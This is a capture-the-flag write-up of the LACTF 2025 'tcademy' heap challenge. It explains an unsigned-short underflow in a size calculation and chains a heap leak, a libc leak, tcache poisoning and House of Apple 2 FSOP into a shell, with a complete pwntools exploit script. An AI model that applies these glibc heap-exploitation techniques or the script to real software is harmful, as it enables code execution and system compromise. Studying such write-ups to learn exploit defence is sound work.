tcademy - LACTF 2025 PWN Writeup
Category: PWN
Difficulty: Medium-Hard
Points: 269
Solves: 40
Flag: lactf{omg_arb_overflow_is_so_powerful}
Solved by: Smothy @ 0xN1umb

"Who needs a double-free when you have unsigned short math?"
Challenge Description
I'm telling you, tcache poisoning doesn't just happen due to double-frees!
nc chall.lac.tf 31144
A heap note manager with 2 slots. The challenge author was very proud of preventing off-by-ones. Spoiler: they introduced something way worse.
TL;DR
Unsigned short underflow in size calculation gives us a massive heap overflow from a tiny chunk. We chain heap leak + libc leak + tcache poison + House of Apple 2 FSOP to pop a shell. Heap math go brrr.
Initial Recon
We get a 64-bit binary with ALL protections enabled:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Full RELRO means no GOT overwrite. No __malloc_hook/__free_hook (glibc 2.35). SHSTK + IBT means CET is enabled. We need FSOP for code execution.
The binary is a simple note manager with 2 slots: create, delete, read, exit. Delete properly NULLs the pointer (no UAF/double-free). Reading uses puts().
Step 1: Finding The Bug
The "off-by-one prevention" code:
unsigned short resized_size = size == 8 ? (unsigned short)(size - 7) : (unsigned short)(size - 8);
int bytes = read(0, note, resized_size);The key insight: size is checked to be < 0 || > 0xf8, but size=0 passes the check. Then:
resized_size = (unsigned short)(0 - 8) = 0xFFF8
Unsigned short underflow! malloc(0) returns a minimum 0x20 chunk, but read() lets us write 65528 bytes from it. That's a massive heap overflow.
Step 2: Heap Layout & Overflow Strategy
The heap layout after initial allocations:
page+0x290: [overflow chunk hdr] (size 0x21)
page+0x2a0: [overflow chunk data] ← we write from here
page+0x2b0: [target chunk hdr] (size 0x31) ← we overflow into here
page+0x2c0: [target chunk data] ← and here (tcache fd pointer)
page+0x2e0: [top chunk]
From a 0x10-byte user data area, we can overflow arbitrarily far. The strategy:
- Phase 1: Overflow to leak heap address (safe-linked tcache fd)
- Phase 2: Corrupt chunk size to get unsorted bin → leak libc
- Phase 3: Tcache poison → overwrite
_IO_list_all→ FSOP → shell
Step 3: Phase 1 - Heap Leak
# Alloc two chunks, free both to tcache
create(p, 0, 8, b'A') # 0x20 chunk at page+0x2a0
create(p, 1, 0x28, b'B'*0x20) # 0x30 chunk at page+0x2c0
delete(p, 1) # tcache[0x30]: page+0x2c0
delete(p, 0) # tcache[0x20]: page+0x2a0
# Overflow: fill through to the safe-linked fd
padding = b'\x41' * 0x10 + b'\x42' * 8 + b'\x43' * 8
create(p, 0, 0, padding) # size=0 → 0xFFF8 byte overflow!
# puts() reads through non-null bytes to the fd pointer
leak_data = read_note(p, 0)
heap_shifted = u64(leak_data[0x20:].rstrip(b'\n').ljust(8, b'\x00'))
page_base = heap_shifted << 12 # safe-linking: fd = addr >> 12glibc 2.35 safe-linking stores: fd = (chunk_addr >> 12) ^ next_ptr. For a single tcache entry, next_ptr = NULL, so fd = chunk_addr >> 12. We shift back to get the heap page base.
Step 4: Phase 2 - Libc Leak via Unsorted Bin
Tcache only handles chunks up to 0x410 bytes. If we can make glibc think a chunk is 0x420+ bytes, free goes to the unsorted bin, which stores libc pointers (main_arena).
# Corrupt chunk size from 0x31 to 0x421
data = b'\x41' * 0x10 + p64(0) + p64(0x421)
# Must write fake top chunk + guard chunks for validation
fill = b'\x00' * 0x20 + p64(0) + p64(0x20d21) + b'\x00' * (0x410 - 0x30)
data += fill
data += p64(0x420) + p64(0x21) + p64(0)*2 # guard chunk 1
data += p64(0x20) + p64(0x21) # guard chunk 2
create(p, 0, 0, data)
delete(p, 1) # chunk thinks it's 0x421 → unsorted bin!Then overflow again to read the unsorted bin fd pointer:
unsorted_bin_addr = u64(libc_raw.ljust(8, b'\x00'))
libc_base = unsorted_bin_addr - 0x21ace0 # empirically determined offsetThe offset 0x21ace0 was determined by comparing the leaked pointer against /proc/pid/maps during local testing.
Step 5: Phase 3 - Tcache Poison + House of Apple 2
Now we have both heap and libc leaks. Time for the kill.
Tcache poisoning: Allocate two 0x30 chunks from the unsorted bin remainder, free them to tcache, then overflow to corrupt the fd pointer:
poison_fd = safe_key ^ io_list_all # safe-linking encodeThis makes the tcache chain: page+0x2c0 → _IO_list_all. Two allocations later, we write our fake FILE struct address to _IO_list_all.
House of Apple 2 (FSOP): When exit() calls _IO_flush_all_lockp, it iterates through _IO_list_all. Our fake FILE struct triggers:
exit()
→ _IO_flush_all_lockp()
→ _IO_OVERFLOW(fake_file, EOF) [vtable = _IO_wfile_jumps]
→ _IO_wfile_overflow()
→ _IO_wdoallocbuf()
→ _IO_WDOALLOCATE() [wide_vtable→__doallocate = system]
→ system(fake_file) [_flags = " sh\0"]
→ shell!
The fake FILE struct layout:
_flags = 0x00687320→ bytes in memory:" sh\0"(argument to system)_mode = 1→ triggers wide-oriented pathvtable = _IO_wfile_jumps→ passes vtable validation (it's legit!)_wide_data→_wide_vtable→__doallocate = system→ the unvalidated call
The Flag
$ id
uid=1000 gid=1000 groups=1000
$ cat /app/flag.txt
lactf{omg_arb_overflow_is_so_powerful}
lactf{omg_arb_overflow_is_so_powerful}
Indeed, arbitrary overflow IS so powerful.
The Solve Script
#!/usr/bin/env python3
"""
tcademy - LACTF 2025 PWN
Unsigned short underflow → heap overflow → tcache poison → House of Apple 2
Solved by: Smothy @ 0xN1umb
"""
from pwn import *
context.binary = elf = ELF('./chall')
libc = ELF('./libc.so.6')
SYSTEM = libc.sym.system
IO_LIST_ALL = libc.sym._IO_list_all
IO_WFILE_JUMPS = libc.sym._IO_wfile_jumps
UNSORTED_BIN_OFFSET = 0x21ace0
def conn():
if args.REMOTE:
return remote('chall.lac.tf', 31144)
return process('./chall')
def create(p, idx, size, data):
p.sendlineafter(b'Choice > ', b'1')
p.sendlineafter(b'Index: ', str(idx).encode())
p.sendlineafter(b'Size: ', str(size).encode())
p.sendafter(b'Data: ', data)
def delete(p, idx):
p.sendlineafter(b'Choice > ', b'2')
p.sendlineafter(b'Index: ', str(idx).encode())
def read_note(p, idx):
p.sendlineafter(b'Choice > ', b'3')
p.sendlineafter(b'Index: ', str(idx).encode())
return p.recvline()
p = conn()
# === Phase 1: Heap Leak ===
create(p, 0, 8, b'A')
create(p, 1, 0x28, b'B' * 0x20)
delete(p, 1)
delete(p, 0)
padding = b'\x41' * 0x10 + b'\x42' * 8 + b'\x43' * 8
create(p, 0, 0, padding)
leak_data = read_note(p, 0)
heap_shifted = u64(leak_data[0x20:].rstrip(b'\n').ljust(8, b'\x00'))
page_base = heap_shifted << 12
safe_key = page_base >> 12
log.success(f"Heap page base: {hex(page_base)}")
# Restore tcache metadata
delete(p, 0)
restore = b'\x41' * 0x10 + p64(0) + p64(0x31) + p64(safe_key)
create(p, 0, 0, restore)
# === Phase 2: Libc Leak ===
create(p, 1, 0x28, b'C\n')
delete(p, 0)
data = b'\x41' * 0x10 + p64(0) + p64(0x421)
fill = b'\x00' * 0x20 + p64(0) + p64(0x20d21) + b'\x00' * (0x410 - 0x30)
data += fill
data += p64(0x420) + p64(0x21) + p64(0)*2
data += p64(0x20) + p64(0x21)
create(p, 0, 0, data)
delete(p, 1)
delete(p, 0)
leak_pad = b'\x41' * 0x10 + b'\x42' * 8 + b'\x43' * 8
create(p, 0, 0, leak_pad)
libc_raw = read_note(p, 0)[0x20:].rstrip(b'\n')
libc_base = u64(libc_raw.ljust(8, b'\x00')) - UNSORTED_BIN_OFFSET
system_addr = libc_base + SYSTEM
io_list_all = libc_base + IO_LIST_ALL
io_wfile_jumps = libc_base + IO_WFILE_JUMPS
log.success(f"Libc base: {hex(libc_base)}")
# Restore chunk size
delete(p, 0)
create(p, 0, 0, b'\x41' * 0x10 + p64(0) + p64(0x421))
# === Phase 3: Tcache Poison + FSOP ===
delete(p, 0)
create(p, 0, 0x28, b'D\n')
create(p, 1, 0x28, b'E\n')
delete(p, 1)
delete(p, 0)
poison_fd = safe_key ^ io_list_all
fake_file_addr = page_base + 0x2d0
fake_wide_data_addr = fake_file_addr + 0xe0
fake_wide_vtable_addr = fake_wide_data_addr + 0xe8
lock_addr = fake_file_addr + 0x10
# Fake FILE struct (House of Apple 2)
fake_file = p32(0x00687320) + p32(0) # _flags = " sh\0"
fake_file += p64(0)*3 # read_ptr, read_end, read_base
fake_file += p64(0) + p64(1) + p64(0) # write_base=0, write_ptr=1, write_end
fake_file += p64(0)*5 # buf_base..save_end
fake_file += p64(0)*2 # markers, chain
fake_file += p32(0)*2 + p64(0)*2 # fileno, flags2, old_offset, cur_column
fake_file += p64(lock_addr) + p64(0)*2 # lock, offset, codecvt
fake_file += p64(fake_wide_data_addr) # _wide_data
fake_file += p64(0)*3 # freeres_list/buf, __pad5
fake_file += p32(1) + b'\x00' * 20 # _mode=1, _unused2
fake_file += p64(io_wfile_jumps) # vtable
# Fake _IO_wide_data
fake_wide = p64(0)*3 # read ptrs
fake_wide += p64(0) + p64(1) + p64(0) # write_base=0, write_ptr=1
fake_wide += p64(0)*2 # buf_base=0, buf_end
fake_wide += b'\x00' * (0xe0 - 0x40) # padding
fake_wide += p64(fake_wide_vtable_addr) # _wide_vtable
# Fake wide vtable
fake_vtable = b'\x00' * 0x68 + p64(system_addr) # __doallocate = system
# Overflow payload
payload = b'\x41' * 0x10 + p64(0) + p64(0x31) # padding + chunk header
payload += p64(poison_fd) + p64(0) # poisoned fd + key
payload += fake_file + fake_wide + fake_vtable # FSOP structures
create(p, 0, 0, payload)
create(p, 1, 0x28, b'F\n') # consume legitimate entry
delete(p, 0)
create(p, 0, 0x28, p64(fake_file_addr)) # write to _IO_list_all
# Trigger: exit → FSOP → system(" sh")
p.sendlineafter(b'Choice > ', b'4')
p.interactive()The Graveyard of Failed Attempts
-
Wrong unsorted bin offset: Initially tried brute-forcing the main_arena offset. Spent hours getting "goodbye!" with no shell. Had to empirically determine the exact offset (0x21ace0) by reading
/proc/pid/mapsduring local testing. -
heap_basevspage_baseconfusion: Usedheap_base = (leaked << 12) - 0x2c0as the reference point, makingfake_file_addroff by 0x2c0 bytes. The fake FILE was placed in the wrong location. Fixed by usingpage_base = leaked << 12directly. -
"double free or corruption (out)": Overflowing to corrupt the chunk size also destroyed the top chunk header at page+0x2e0. Had to write a fake top chunk with valid size and PREV_INUSE bit during the overflow.
-
Thought
read()wasgetchar(): Spent time debugging a phantom "I/O deadlock" that didn't exist. The source code usesread(0, note, resized_size)which returns immediately with available bytes. Classic RTFM moment. -
GDB with pwndbg broken: pwndbg's virtualenv was corrupted, had to resort to LD_PRELOAD malloc/free tracing hooks for heap debugging.
Key Takeaways
- Unsigned integer underflow is dangerous - even "safe" arithmetic like
size - 8becomes a massive overflow when unsigned and size < 8 - House of Apple 2 bypasses vtable validation - the main FILE vtable is validated, but
_wide_data->_wide_vtableis NOT - glibc 2.35 safe-linking requires a heap leak to poison tcache -
stored_fd = (chunk_addr >> 12) ^ target - Always empirically verify offsets - don't guess the main_arena offset, measure it with
/proc/pid/maps - Unsorted bin requires careful setup - fake top chunk headers and guard chunks to pass glibc's consolidation checks
Tools Used
- pwntools (exploit framework)
- objdump (disassembly verification)
- Custom LD_PRELOAD hooks (malloc/free tracing)
- Way too much caffeine
Writeup by Smothy from 0xN1umb team. Three phases, one overflow, zero double-frees. The tcache never saw it coming. GG.